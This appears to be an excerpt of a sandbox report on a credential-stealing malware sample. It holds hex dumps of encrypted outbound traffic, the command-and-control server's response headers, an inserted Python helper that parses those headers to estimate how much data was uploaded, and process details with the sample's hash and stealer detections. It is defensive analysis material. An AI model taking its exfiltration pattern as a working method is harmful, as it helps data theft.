2024-12-18 14:18:07 UTC | 15331 | OUT | Data Raw: c5 61 e6 e6 10 b9 7b 27 b8 d1 7c 04 37 79 25 d6 50 7a a3 80 6e 16 f2 d2 9b bf ef 59 48 d7 d7 86 b5 21 cb 87 3c a3 9f 1f 10 1a 90 b1 5a e3 f3 cf 3f 7f 8d 39 91 25 33 94 12 97 2c 90 2c 3d 92 44 fd 91 72 53 a7 12 b7 7a ea 1b cf b0 fc 68 5d 78 88 2e ba 4d 2c 60 1f 71 17 9c ff f5 f3 dd 1c 7e 14 ea fb 54 e0 e5 5f c2 61 f7 0a cd 77 89 ed 10 24 2e 96 f9 8c df d4 8f f0 d2 2a cc a4 b7 15 ae 3c a9 0b 74 4f 8b 8c 88 d8 3c 78 19 79 bb ee 59 41 f8 37 ea 4c fa 1c 4b 1d 75 6a 5d 9c 61 b7 a7 05 7d 75 3f 3e 8d 36 4f 6c fe 62 28 ba 32 2c 43 17 fa 98 4d 99 21 b8 f1 82 4b 0a 1a 90 63 5b eb 74 a5 cd 76 69 ff c6 bd ba f9 d0 c4 e0 99 9b 15 1b d7 7c da 4f 1f 29 b1 df 1e 2f 9a ff f1 8c e5 2f 51 5c ec 08 f0 93 3e 4b 3f 35 06 9e 39 27 cf c5 1a ac 59 3e b5 59 ff 3b 92 90 a9 9f 60 9d
Data Ascii: a{'|7y%PznYH!<Z?9%3,,=DrSzh]x.M,`q~T_aw$.*<tO<xyYA7LKuj]a}u?>6Olb(2,CM!Kc[tvi|O)//Q\>K?59'Y>Y;`
2024-12-18 14:18:07 UTC | 15331 | OUT | Data Raw: 6f 21 03 49 f6 dd d5 3f c9 6f a9 01 5b bf 6a 5e 73 14 48 a5 b0 9a 7c f0 86 76 2a 47 7f 72 14 7c d2 33 ea 8c d3 67 e7 6a ab 05 fa 45 46 7f fe cd 46 62 25 96 0e 0c 5a 7d ce 88 8e e5 6e 75 e6 5f ff 8f a1 56 9f e5 f0 bb 26 af d4 0e 65 01 e2 47 af 98 1a a0 8e 9b 1c d0 02 b1 bf 04 f1 5f e6 c3 26 9e e3 7c 3e 57 aa b5 1e 6e 79 d5 70 93 24 c6 15 e7 3f a0 40 e4 b5 f6 9a 1a 4f 1e 02 f9 5e a1 b4 27 6c 58 ec f9 88 cc 5f 79 86 ed 00 8c 7c eb da d1 c1 48 90 5a fb e6 54 d2 f5 58 05 f5 04 40 6d 35 8a fe 42 ea 24 a8 87 55 7b cd 25 36 86 fe ed 91 bc c9 b3 a0 35 b4 7e 8e 4e 32 fa 08 27 93 d2 59 86 37 82 eb 17 c3 39 79 19 7a bc 19 31 11 4d 6d cb 89 8b 47 92 e6 c2 bc 7f ae 37 ea 92 54 b6 72 7c 16 3c 92 f2 7e d8 0c 89 6d 5d ca ee b9 58 a8 09 56 61 42 c2 67 37 38 ff 6e 6c 2f bb
Data Ascii: o!I?o[j^sH|v*Gr|3gjEFFb%Z}nu_V&eG_&|>Wnyp$?@O^'lX_y|HZTX@m5B$U{%65~N2'Y79yz1MmG7Tr|<~m]XVaBg78nl/
2024-12-18 14:18:07 UTC | 15331 | OUT | Data Raw: 05 d1 54 00 b1 ae 15 71 bd c1 5a 29 23 5e 60 17 ea de ab ba c3 42 72 91 c7 f4 18 a8 36 ae c3 87 37 1f 49 89 8e 44 0f 8b 09 bd 2f ea 38 ce db 79 9e cb 78 f5 58 c6 9a 5c d3 a8 b8 c3 72 ec ab ef c6 01 d4 f5 77 bc 0e a1 7a 8b 16 2d f8 35 85 c9 df a7 50 23 69 dc 05 11 a2 66 46 50 bf 01 72 74 5b 5d ea cd ab c0 c8 0c ca 78 a0 81 79 44 dd b8 ec 7c 6b 97 10 15 57 ca 3b 1b f2 bf 85 e3 46 ab 38 e0 6a 0b 3b 80 44 a7 84 cb 1a 15 68 17 01 f5 85 02 74 99 37 e3 34 d9 04 14 48 fe fd c1 c7 f5 18 19 dc ea 4e ad e1 6a e7 53 68 70 50 43 00 c2 93 0d eb aa 3b 64 a0 8c 52 20 29 1e 8b e1 39 ba d5 12 9c fa 42 67 f6 e7 f5 46 da 0b db 03 55 9d b1 5c c7 f9 20 f5 10 9c 9c b9 19 2e a3 5e 2a 48 2d 79 d2 5d 2e 8a a9 80 f8 d6 8a cb 25 c9 87 11 9b c7 56 dc 1c 22 98 42 6d 30 30 93 8a 4f f7
Data Ascii: TqZ)#^`Br67ID/8yxX\rwz-5P#ifFPrt[]xyD|kW;F8j;Dht74HNjShpPC;dR )9BgFU\ .^*H-y].%V"Bm00O
2024-12-18 14:18:07 UTC | 15331 | OUT | Data Raw: dd fb 04 69 7c cf b0 78 32 7f 7b 3b 73 7a 9a 14 47 4d 04 3b 0e a9 4f e9 7d 52 93 15 b8 93 37 4b 6a a4 1a 89 13 d8 b2 a0 27 bd c8 98 17 7a ba 1f f9 06 bb 82 84 de 80 58 a2 bd 07 0a 85 92 1c d5 fc ed d0 d6 b4 0a 57 9c ef ae c6 a6 9c 79 88 10 2f 90 5a 42 31 46 ef c5 11 ae ff 51 8b 8d 16 18 9f 7f 38 6b 5e d3 65 a6 b4 5e 3e 78 fe 77 da e2 9a 65 29 34 5f 00 b7 1d 8e 5c ce f0 41 57 ec b1 08 5a be 72 c5 06 0f 5e 96 fd 7b b0 de 0d f9 6a 76 20 24 09 24 f1 a3 e5 ec 7d 15 5f c6 ec c3 75 2d 88 ad f1 a3 fc 89 10 ef ff 70 9d 46 53 45 df 56 ad 19 3b 29 ad d1 e6 c0 dc a4 ab f5 f0 0d 9f cd 96 f8 8b b7 c8 7d 26 8d 16 79 84 d4 00 8e e5 33 35 f5 a6 ec b8 d8 d8 f0 1c 23 6a 6c 50 86 04 fe 57 77 91 f6 6a 31 a1 ad 75 43 af 85 8c 13 b8 34 aa 36 f7 0b 4c 5f c6 3c 57 14 04 89 0f a9
Data Ascii: i|x2{;szGM;O}R7Kj'zXWy/ZB1FQ8k^e^>xwe)4_\AWZr^{jv $$}_u-pFSEV;)}&y35#jlPWwj1uC46L_<W
2024-12-18 14:18:07 UTC | 15331 | OUT | Data Raw: 98 3a 83 23 5a d0 93 05 5e c9 f3 83 e6 1e c6 bb dd c7 46 29 e2 9e 77 b3 84 75 71 06 d9 3e d8 ed 1f 85 21 f2 ec fa 61 b7 2b 82 a3 59 55 90 55 00 0a 02 af d1 a9 ad e9 50 fe 35 f2 a6 29 54 c1 7f 03 19 ee 1f d4 c1 ac 05 8e aa 8d 34 28 e2 b6 73 84 1b 4c 33 65 e4 5f 65 55 f0 bf 2f 5b e3 11 c5 0b 93 ca f8 28 d4 76 ac 9a 76 93 9a 4b e4 e4 ca 8f 77 54 75 39 ca 22 de 70 e5 b4 f1 7c 54 67 fb de 9d a6 97 5f 4b 75 6e bf e3 3c 13 1b 6e 3e 22 d2 f2 06 1c ec 8d 56 98 fb 69 58 52 85 39 80 12 49 c4 e1 88 4c a5 22 6f cc 73 29 fb 2f 86 78 ec 59 b2 6e ef 9a 97 07 7f 42 2f 93 d6 83 4a a2 43 ac e6 33 b0 90 7c 39 88 0d 7f 3d ee 8f a0 9d 39 fc 6a c7 72 c2 6e f7 f7 a9 96 24 13 34 52 70 66 8b 6c cb 54 49 f4 a8 94 ec 77 05 0c ff 59 55 48 d5 82 d8 a5 35 5d fa ba a6 b3 44 2e 3a 4e 88
Data Ascii: :#Z^F)wuq>!a+YUUP5)T4(sL3e_eU/[(vvKwTu9"p|Tg_Kun<n>"ViXR9IL"os)/xYnB/JC3|9=9jrn$4RpflTIwYUH5]D.:N
2024-12-18 14:18:07 UTC | 15331 | OUT | Data Raw: 9f 65 0e 78 03 92 27 cb 11 14 b8 a2 8c d1 40 96 2f 61 63 5b 70 24 8a ea c8 3d a3 4a ef f8 d1 69 37 0b 32 3f 30 b4 1b ea 2e 5b 93 87 9f 91 f4 65 25 4a 09 fa 2d 28 61 b0 29 17 a3 8f 30 bb de ae c9 4f b7 a3 20 aa 9d e4 a4 01 09 ee 23 8c 41 5f 5f 34 6a a4 02 20 0a c9 6a 6c 9c 85 1f 03 14 49 df 74 61 0e 0b bd 80 a2 6e 0b 81 19 38 05 72 8a 04 d8 b5 27 13 1d 62 71 ea 2f 34 a4 4c d0 df 67 b3 41 1b d2 ac 22 3f d9 32 09 7d e6 b3 e4 bb e5 44 c1 69 43 b4 73 27 d3 04 c5 2b da 33 98 5f db 79 44 2f 09 6a 4c a0 01 78 6a d5 73 ab c2 6e 6a 13 82 a5 8e 59 a3 cd 41 8f df 05 4b 71 b6 61 db d7 f2 11 94 24 54 af b0 87 51 17 5b fe d6 25 10 ce 7f d3 f3 82 f6 f0 9d 65 6e f7 4d fe 10 ca 81 3e 68 ca 12 f7 73 62 15 b9 76 40 fc 7e b8 bf 04 87 59 c9 6f df 66 03 b0 d0 cf 67 24 b5 8c 08
Data Ascii: ex'@/ac[p$=Ji72?0.[e%J-(a)0O #A__4j jlItan8r'bq/4LgA"?2}DiCs'+3_yD/jLxjsnjYAKqa$TQ[%enM>hsbv@~Yofg$
2024-12-18 14:18:07 UTC | 15331 | OUT | Data Raw: e7 8b b0 9c ca ad cf 64 de 8b ca c1 f2 da e4 8e 2e 34 7a eb ab 0a b5 10 cc 80 a3 60 7a 2c 1c 08 f0 22 84 c6 d3 6e d1 75 33 45 75 d7 a2 82 71 4b 60 02 8b 5a 4c 34 41 9e 1d b6 2c 88 0f 88 8b a9 65 7b 0a dd 46 6b 1b 47 4b e7 9d 69 d1 ee b7 e4 52 80 44 9c 2c ff f0 e8 87 9e 2c 89 10 6d 9b 8a d0 d9 bb 44 6d 31 57 8e f3 29 5f b1 13 e3 9c 72 21 ce 9a d3 0f ff 9f 0c 44 f8 23 a5 a5 4a 08 18 3b fa ab 72 fe b8 49 77 50 04 c9 da d2 d5 8a 10 35 ff a3 02 f2 34 1a e4 bc 21 e9 5f 79 11 13 fd 49 65 2d e0 41 69 c4 1d b2 15 d2 76 f0 b6 7e 5b eb 11 14 a1 ba 5d e6 96 cb 9b 3c 10 56 f4 80 96 8f 42 e9 dd 30 6c 60 4d 60 4f 81 50 7f 21 a0 bc 0c 0a c2 31 ff 7b 05 0e a9 0d f1 eb 58 3f 04 8c dc 6e 66 a8 0e f4 83 32 6e e1 3a 93 9d 47 0e 61 48 fd 0c 63 bb b7 74 08 56 43 e0 ba 34 db 46
Data Ascii: d.4z`z,"nu3EuqK`ZL4A,e{FkGKiRD,,mDm1W)_r!D#J;rIwP54!_yIe-Aiv~[]<VB0l`M`OP!1{X?nf2n:GaHctVC4F
2024-12-18 14:18:07 UTC | 15331 | OUT | Data Raw: 27 98 7f 07 63 9f 31 42 fd 6f b9 45 bf 32 44 de 8a 7a f7 73 26 10 bb 15 3f 31 10 99 a2 16 a4 71 0e 63 2c 6d b8 ba d9 aa cd 8e 30 2f 06 22 a4 72 e4 62 66 bd 9a 8d 37 a1 3f ea 4e f0 9c 49 73 40 2d 3a 5e 30 fb e8 5a 3d 03 13 ad aa 5c 30 47 2f 79 25 fa ac 76 f9 d8 52 a0 df 21 33 0b 05 90 38 85 a4 9f c4 18 f2 18 d7 b5 be 5b 97 f5 29 17 4f 0d 18 22 fc 2f 17 d0 8b f6 7f fe d1 2d 00 5e b8 d0 04 39 17 45 e6 7e ee 48 a5 46 53 05 c1 71 18 f7 ef c4 74 4a 6b 7d ed 7d 31 02 af a0 fb 73 f7 27 6e 5f 35 36 e2 9e a0 b0 2c a7 38 0d f7 9a e9 88 0d 7d 79 5a c7 5d 1f 2b 92 dc eb 67 26 44 08 4c bf 10 8f 06 f8 6e ff f9 be 07 e7 8b a1 d0 7f 37 cf 8f 24 4c a3 62 04 81 fe 11 3b 8c 21 f3 8e 75 15 00 a5 0d 0a 4c 7c e2 5d 3a 3f 29 9d 54 3b c1 d1 fb 77 0b 22 3d 81 80 47 30 a3 64 f1 a1
Data Ascii: 'c1BoE2Dzs&?1qc,m0/"rbf7?NIs@-:^0Z=\0G/y%vR!38[)O"/-^9E~HFSqtJk}}1s'n_56,8}yZ]+g&DLn7$Lb;!uL|]:?)T;w"=G0d
2024-12-18 14:18:14 UTC | 1049 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 14:18:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=rvs2eepckrirl1gq7ufq9qkou1; expires=Sun, 13-Apr-2025 08:04:49 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vprXaRM4FBI%2BkCIt9nHgMBr00YM%2BHwnpKLLgtUrkMGVPpgaRL6CnP%2BSaGoVvwzH7lefX7vjRIIeNF%2FHDj6QdOuOHgGHhYki%2BexURZzqzODEmbEFvqHSv8YitYEeTRVY9Z1Q%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
                                                                                                                                                                                                                                        CF-RAY: 8f3fc7c8fc5a4315-EWR
                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=24279&min_rtt=1664&rtt_var=14132&sent=305&recv=622&lost=0&retrans=0&sent_bytes=2836&recv_bytes=597097&delivery_rate=1754807&cwnd=218&unsent_bytes=0&cid=2910d97bbd5dfd0b&ts=6564&x=0"
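The C2 response above carries more than a 200 OK: the Set-Cookie line shows a PHP session minted for the infected host, and Cloudflare's cfL4 server-timing metric exposes TCP counters for the edge's side of the connection, so recv_bytes is a direct measure of how much the sample uploaded in this one connection. The following Python is an added triage helper written for this page, not part of the Joe Sandbox report or of LummaC; the captured headers are embedded as the input, and the reading of the cfL4 byte counters as edge-side (client upload = recv_bytes) is an assumption about Cloudflare's metric, not something the report states.

```python
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs

# The response headers exactly as captured in the report above (body omitted).
C2_RESPONSE = "\r\n".join([
    "HTTP/1.1 200 OK",
    "Date: Wed, 18 Dec 2024 14:18:14 GMT",
    "Content-Type: text/html; charset=UTF-8",
    "Transfer-Encoding: chunked",
    "Connection: close",
    "Set-Cookie: PHPSESSID=rvs2eepckrirl1gq7ufq9qkou1; expires=Sun, 13-Apr-2025 08:04:49 GMT; Max-Age=9999999; path=/",
    "Expires: Thu, 19 Nov 1981 08:52:00 GMT",
    "Cache-Control: no-store, no-cache, must-revalidate",
    "Pragma: no-cache",
    "cf-cache-status: DYNAMIC",
    "vary: accept-encoding",
    "Server: cloudflare",
    "CF-RAY: 8f3fc7c8fc5a4315-EWR",
    'alt-svc: h3=":443"; ma=86400',
    'server-timing: cfL4;desc="?proto=TCP&rtt=24279&min_rtt=1664&rtt_var=14132&sent=305&recv=622&lost=0&retrans=0&sent_bytes=2836&recv_bytes=597097&delivery_rate=1754807&cwnd=218&unsent_bytes=0&cid=2910d97bbd5dfd0b&ts=6564&x=0"',
    "",
    "",
])


def parse_response(raw):
    """Split a raw HTTP/1.1 response into (status_code, headers).

    headers maps lower-cased names to a list of values so repeated
    headers (Set-Cookie is commonly repeated) are not silently lost."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.splitlines()
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers


def parse_set_cookie(value):
    """Return {'name', 'value', 'attrs'} for one Set-Cookie header value."""
    parts = [p.strip() for p in value.split(";")]
    name, _, val = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, attr_val = part.partition("=")
        attrs[key.lower()] = attr_val
    return {"name": name, "value": val, "attrs": attrs}


def parse_cf_l4(server_timing):
    """Decode Cloudflare's cfL4 metric: the desc attribute is a query string
    of TCP counters. Assumption: counters are taken at the edge, so
    recv_bytes is what the client (the infected host) sent."""
    if not server_timing.startswith("cfL4"):
        return None
    start = server_timing.index('desc="') + len('desc="')
    desc = server_timing[start:server_timing.index('"', start)].lstrip("?")
    counters = {}
    for key, vals in parse_qs(desc).items():
        counters[key] = int(vals[0]) if vals[0].isdigit() else vals[0]
    return counters


def cookie_expiry_drift(date_header, cookie):
    """Seconds between the cookie's Expires attribute and Date + Max-Age.
    A small value means the same clock minted both; a large one hints the
    cookie was produced elsewhere (e.g. a backend behind the CDN)."""
    issued = datetime.strptime(date_header, "%a, %d %b %Y %H:%M:%S GMT")
    expires = datetime.strptime(cookie["attrs"]["expires"], "%a, %d-%b-%Y %H:%M:%S GMT")
    issued = issued.replace(tzinfo=timezone.utc)
    expires = expires.replace(tzinfo=timezone.utc)
    expected = issued + timedelta(seconds=int(cookie["attrs"]["max-age"]))
    return int((expires - expected).total_seconds())


def triage(raw):
    """Summarise the captured response into the fields an analyst wants."""
    status, headers = parse_response(raw)
    cookie = parse_set_cookie(headers["set-cookie"][0])
    l4 = parse_cf_l4(headers["server-timing"][0])
    return {
        "status": status,
        "server": headers.get("server", [""])[0],
        "cf_ray": headers.get("cf-ray", [""])[0],
        "session_cookie": cookie["name"],
        "cookie_lifetime_days": int(cookie["attrs"]["max-age"]) // 86400,
        "cookie_expiry_drift_s": cookie_expiry_drift(headers["date"][0], cookie),
        "client_upload_bytes": l4["recv_bytes"],
        "server_download_bytes": l4["sent_bytes"],
        "retransmits": l4["retrans"],
    }


if __name__ == "__main__":
    for key, value in triage(C2_RESPONSE).items():
        print(f"{key:>24}: {value}")
```

Run against the captured headers, the summary reports roughly 597 KB uploaded by the client against under 3 KB sent back, which is the shape of a stealer exfiltration rather than of a page fetch, and a 115-day PHPSESSID whose Expires value lines up with the Date header to within a few seconds.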


Target ID:1
Start time:09:17:34
Start date:18/12/2024
Path:C:\Users\user\Desktop\ji2xlo1f.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\ji2xlo1f.exe"
Imagebase:0x6a0000
File size:6'289'408 bytes
MD5 hash:9F8CA917737B3233ABB943EDC065659C
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.2446810949.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:true

No disassembly